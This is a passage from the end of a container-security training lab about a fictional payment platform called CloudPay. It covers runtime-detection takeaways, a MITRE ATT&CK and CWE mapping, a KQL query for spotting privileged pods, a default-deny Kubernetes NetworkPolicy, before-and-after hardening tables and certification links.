| where unique_destinations > 5
| sort -unique_destinations
| rename src_pod as "Source Pod", unique_destinations as "Destinations Contacted",
         connection_count as "Total Connections"

Key Takeaways — Exercise 5

Runtime Security Principles

  1. Runtime detection is the last line of defense — Prevention fails; runtime monitoring with Falco/eBPF detects what gets past admission controllers and network policies
  2. eBPF provides kernel-level visibility — Tetragon and Cilium Hubble observe syscalls, file access, and network connections without container modification
  3. Forensics before remediation — Always capture evidence (pod spec, logs, filesystem diff, network state) before deleting compromised containers
  4. Automate response — Falco Sidekick can automatically quarantine pods, alert teams, and trigger incident workflows
  5. Log everything centrally — Container logs, Kubernetes audit logs, Falco alerts, and network flow logs must all aggregate to SIEM for correlation
  6. Monitor security posture continuously — Track metrics like root containers, missing resource limits, image vulnerabilities, and Falco alert rates in dashboards

Lab Summary

What You Accomplished

In this lab, you performed a comprehensive container security assessment of the CloudPay payment processing platform:

Exercise Focus Area Key Outcome
1 Image Security Reduced vulnerabilities by 95.5% via multi-stage builds, distroless images, and scanning
2 Pod Security Enforced Restricted Pod Security Standards with SecurityContext, RBAC, and OPA Gatekeeper
3 Container Escape Simulated and detected Docker socket, privileged, and cgroup escape techniques
4 Network Policies Implemented default-deny segmentation with Kubernetes NetworkPolicy, Calico, and Istio mTLS
5 Runtime Security Deployed Falco rules, eBPF monitoring, and container forensics workflows

MITRE ATT&CK Mapping

| Technique ID | Technique Name | Exercise | Detection |
| --- | --- | --- | --- |
| T1611 | Escape to Host | Ex. 3 | Falco rules, KQL, SPL |
| T1610 | Deploy Container | Ex. 2, 3 | Kubernetes audit logs |
| T1613 | Container and Resource Discovery | Ex. 5 | Falco, eBPF |
| T1552 | Unsecured Credentials | Ex. 1, 5 | Image scanning, Falco |
| T1528 | Steal Application Access Token | Ex. 3 | Falco SA token rule |
| T1496 | Resource Hijacking (Cryptomining) | Ex. 5 | Falco, process monitoring |
| T1059 | Command and Scripting Interpreter | Ex. 3 | Reverse shell detection |
| T1105 | Ingress Tool Transfer | Ex. 5 | Binary write detection |
| T1195 | Supply Chain Compromise | Ex. 1, 5 | Image scanning, package manager detection |
| T1205 | Traffic Signaling (Backdoor) | Ex. 5 | Unexpected listener detection |
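As one example of the detection column, a hedged KQL sketch for T1610/T1611: flag privileged container creation in Kubernetes audit logs forwarded to the SIEM. The table name (`KubeAuditLogs`) and column names are assumptions about how the audit log was ingested; adapt them to your actual schema:

```kql
// Hypothetical table/column names — adjust to your audit-log ingestion schema
KubeAuditLogs
| where Verb == "create" and ObjectRef_Resource == "pods"
| extend Spec = parse_json(RequestObject).spec
| mv-expand Container = Spec.containers
| where tobool(Container.securityContext.privileged) == true
| project TimeGenerated, User_Username, ObjectRef_Namespace, ObjectRef_Name,
          ContainerImage = tostring(Container.image)
```

The same logic translates to SPL by searching the audit index for `verb=create` pod events and filtering on the `privileged` flag in the request object.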

Security Controls Implemented

| Category | Before | After |
| --- | --- | --- |
| Image Vulnerabilities | 265 (13 Critical) | 12 (0 Critical) |
| Image Size | 1.2 GB | 89 MB |
| Pod Security Standard | None | Restricted |
| Runs as Root | Yes | No |
| Privileged Containers | Allowed | Blocked by admission controller |
| Docker Socket Mounted | Yes | Blocked by admission controller |
| Network Segmentation | None (allow-all) | Default-deny + explicit allow |
| mTLS | None | Strict (Istio) |
| Cloud Metadata Access | Allowed | Blocked (Calico GlobalNetworkPolicy) |
| Runtime Detection | None | Falco + eBPF (Tetragon) |
| Log Aggregation | None | Fluentd to SIEM |
| Automated Response | None | Falco Sidekick auto-quarantine |
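The "Network Segmentation" row rests on a default-deny baseline that explicit allow policies are layered on top of. A minimal sketch of that baseline policy (the namespace name is illustrative):

```yaml
# Default-deny baseline: an empty podSelector matches every pod in the
# namespace, and declaring both policyTypes with no rules blocks all
# ingress and egress until an explicit allow policy matches.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: cloudpay
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
```

In practice the first allow policies added on top are DNS egress to kube-dns and the specific service-to-service flows the application needs.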

Additional Resources

Cross-References

External Resources

CWE References

| CWE | Name | Exercise |
| --- | --- | --- |
| CWE-250 | Execution with Unnecessary Privileges | Ex. 1, 2 |
| CWE-269 | Improper Privilege Management | Ex. 2, 3 |
| CWE-284 | Improper Access Control | Ex. 2, 4 |
| CWE-311 | Missing Encryption of Sensitive Data | Ex. 4 |
| CWE-522 | Insufficiently Protected Credentials | Ex. 1 |
| CWE-668 | Exposure of Resource to Wrong Sphere | Ex. 3 |
| CWE-732 | Incorrect Permission Assignment | Ex. 2 |
| CWE-778 | Insufficient Logging | Ex. 5 |
| CWE-1188 | Insecure Default Initialization of Resource | Ex. 2, 4 |

Advance Your Career

Recommended Certifications

This lab covers objectives tested in the following certifications. Earning these credentials validates your container and cloud security expertise:

| Certification | Focus | Link |
| --- | --- | --- |
| CKS — Certified Kubernetes Security Specialist | Kubernetes cluster hardening, supply chain security, runtime monitoring, network policies | Learn More |
| CKAD — Certified Kubernetes Application Developer | Kubernetes application design, pod configuration, observability | Learn More |
| CompTIA Cloud+ (CV0-004) | Cloud security, deployment, operations, troubleshooting across multi-cloud | Learn More |
| AWS Certified Security — Specialty | AWS security services, identity management, infrastructure protection, incident response | Learn More |
| CCSP — Certified Cloud Security Professional | Cloud architecture, data security, platform security, compliance | Learn More |

These links are provided for reference. Nexus SecOps may earn a commission from qualifying purchases, which helps support free security education content.